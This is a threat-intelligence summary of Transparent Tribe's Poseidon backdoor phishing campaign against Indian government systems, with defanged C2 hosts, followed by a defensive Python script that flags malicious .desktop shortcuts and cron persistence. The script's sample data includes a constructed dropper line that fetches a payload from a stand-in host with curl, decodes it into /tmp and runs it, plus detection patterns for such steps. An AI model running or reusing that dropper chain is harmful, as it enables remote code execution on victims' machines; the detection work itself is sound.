Poseidon backdoor deployment in Transparent Tribe phishing attacks
Malware Activity
Summary
The Poseidon backdoor is now being deployed in Transparent Tribe attacks, creating a path to long-term access and credential harvesting on targeted systems. The malware is delivered through spear-phishing emails and weaponized .desktop shortcut files. It affects both Windows and BOSS Linux environments and can support data collection and lateral movement.
Related Happenings
Geta RAT, Ares RAT, and DeskRAT cross-platform credential-theft activity
Malware Activity
First: 11.02.2026 16:52
Last: 11.02.2026 16:52
Sources 1
About this happening:
**Geta RAT**, **Ares RAT**, and **DeskRAT** are being deployed across **Windows and Linux** in phishing-led intrusions that enable **credential theft**, **persistent access**, and...
NosyDoor backdoor activity using OneDrive and Google Drive C&C
Malware Activity
First: 18.12.2025 19:34
Last: 18.12.2025 19:34
Sources 1
About this happening:
The **NosyDoor** backdoor is being used to **exfiltrate files** and run **shell commands** inside compromised networks, making the **LongNosedGoblin** toolset more dangerous. The...
FINALDRAFT and ShadowPad toolchain activity
Malware Activity
First: 17.12.2025 13:12
Last: 17.12.2025 13:12
Sources 1
About this happening:
A new **FINALDRAFT** malware variant and **ShadowPad** tooling are being used to increase stealth and **exfiltration throughput** inside compromised networks. The activity support...
AI-powered malware families integrating LLMs during execution
Malware Activity
First: 05.11.2025 16:59
Last: 05.11.2025 16:59
Sources 1
About this happening:
Google's GTIG identified **multiple AI-powered malware families** that use **LLMs during execution**, signaling a shift toward malware that can adapt while running. The set includ...
TikTok activation-guide ClickFix infostealer campaign
Campaign
First: 19.10.2025 21:28
Last: 19.10.2025 21:28
Sources 1
About this happening:
A **TikTok**-based **ClickFix** campaign is using fake **free activation guides** to deliver **info-stealing malware**, putting users seeking software activations at risk of **cre...
Timeline
- 25.08.2025 11:13 · 1 article
Transparent Tribe deploys Poseidon in phishing attacks on Indian government systems
Initial Disclosure: Transparent Tribe, also called APT36, was observed targeting Indian Government entities with spear-phishing emails and weaponized .desktop shortcut files on Windows and BOSS (Bharat Operating System Solutions) Linux systems. The delivery chain used a shell-script dropper to fetch a hex-encoded file from securestore[.]cv, save it as an ELF binary, open a decoy PDF from Google Drive, and establish contact with the hard-coded C2 server modgovindia[.]space:4000 for commands, payload retrieval, and data exfiltration. The activity was assessed to support the Poseidon backdoor, persistence through a cron job, system reconnaissance, anti-debugging checks, credential harvesting, and potential lateral movement.
- Transparent Tribe Targets Indian Govt With Weaponized Desktop Shortcuts via Phishing — thehackernews.com — 25.08.2025 11:13
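As an added example (not code from this page or from the cited article), the following Python script triages the shortcut-abuse pattern described in the timeline entry from a defender's side: a .desktop file posing as a document whose Exec line runs a shell dropper, fetches and decodes a payload, and opens a decoy, plus a check of crontab lines for the persistence step. The heuristics, the sample .desktop and crontab text, and every host name and path in them are constructed assumptions for illustration, not indicators published here.

```python
"""Heuristic triage of .desktop shortcuts and crontab entries.

Added example. The regexes below encode the delivery chain the entry
describes (shell dropper, network fetch, hex decode, temp-path execution,
decoy document); they are assumptions, not published detection rules.
"""
import re

# Constructed sample .desktop files (not real captures).
BENIGN_DESKTOP = """[Desktop Entry]
Type=Application
Name=Text Editor
Exec=gedit %U
Icon=accessories-text-editor
Terminal=false
"""

SUSPICIOUS_DESKTOP = """[Desktop Entry]
Type=Application
Name=Meeting_Notice.pdf
Icon=application-pdf
Terminal=false
Exec=bash -c "curl -s http://payload.example.invalid/stage | xxd -r -p > /tmp/.cache-svc && chmod +x /tmp/.cache-svc && /tmp/.cache-svc; xdg-open https://drive.google.com/file/d/PLACEHOLDER_ID/view"
"""

# Constructed sample crontab (not a real capture).
SAMPLE_CRONTAB = """# m h dom mon dow command
0 3 * * * /usr/bin/updatedb
@reboot /tmp/.cache-svc >/dev/null 2>&1
"""

# Assumed heuristics: regex -> human-readable finding.
EXEC_PATTERNS = {
    r"\b(ba|z|da)?sh\b\s+-c\b": "Exec runs an inline shell command",
    r"\b(curl|wget)\b": "Exec fetches content from the network",
    r"\bxxd\s+-r\b|\bbase64\s+(-d|--decode)\b": "Exec decodes an encoded payload",
    r"\bchmod\s+\+x\b": "Exec marks a downloaded file executable",
    r"(/tmp/|/dev/shm/|/var/tmp/)": "Exec references a world-writable temp path",
    r"\bxdg-open\b.*\bdrive\.google\.com\b": "Exec opens a decoy document from a cloud share",
}
CRON_PATTERNS = {
    r"@reboot": "runs at boot",
    r"(/tmp/|/dev/shm/|/var/tmp/)": "launches a binary from a world-writable temp path",
    r"\b(curl|wget)\b": "fetches from the network on a schedule",
}
DOCUMENT_EXT = re.compile(r"\.(pdf|docx?|xlsx?|pptx?|txt)$", re.IGNORECASE)


def parse_desktop_entry(text):
    """Return the key=value pairs of the [Desktop Entry] group as a dict."""
    entry, in_group = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("["):
            in_group = line == "[Desktop Entry]"
            continue
        if in_group and "=" in line:
            key, _, value = line.partition("=")
            entry[key.strip()] = value.strip()
    return entry


def scan_desktop_entry(text):
    """Return a list of findings for one .desktop file; empty means no hit."""
    entry = parse_desktop_entry(text)
    exec_line = entry.get("Exec", "")
    findings = []
    # A shortcut named like a document that launches a shell instead of a viewer.
    if DOCUMENT_EXT.search(entry.get("Name", "")) and re.search(r"\b(ba|z|da)?sh\b", exec_line):
        findings.append("document-like Name with a shell in Exec")
    for pattern, label in EXEC_PATTERNS.items():
        if re.search(pattern, exec_line):
            findings.append(label)
    return findings


def scan_crontab(text):
    """Return (line, findings) pairs for crontab lines matching any heuristic."""
    hits = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        found = [label for pat, label in CRON_PATTERNS.items() if re.search(pat, line)]
        if found:
            hits.append((line, found))
    return hits


if __name__ == "__main__":
    for name, sample in (("benign", BENIGN_DESKTOP), ("suspicious", SUSPICIOUS_DESKTOP)):
        print(name, scan_desktop_entry(sample))
    for line, found in scan_crontab(SAMPLE_CRONTAB):
        print("cron:", line, found)
```

Any single heuristic alone is noisy (legitimate shortcuts call xdg-open, and administrators do schedule curl jobs), so the point of the script is the combination: a document-named shortcut whose Exec chains fetch, decode, chmod and a temp-path launch, and a boot-time cron entry pointing at the same temp path, together describe the chain in the entry far more specifically than any one match. In a real deployment the same functions would be run over files collected from ~/.local/share/applications, ~/Desktop and the user and system crontabs.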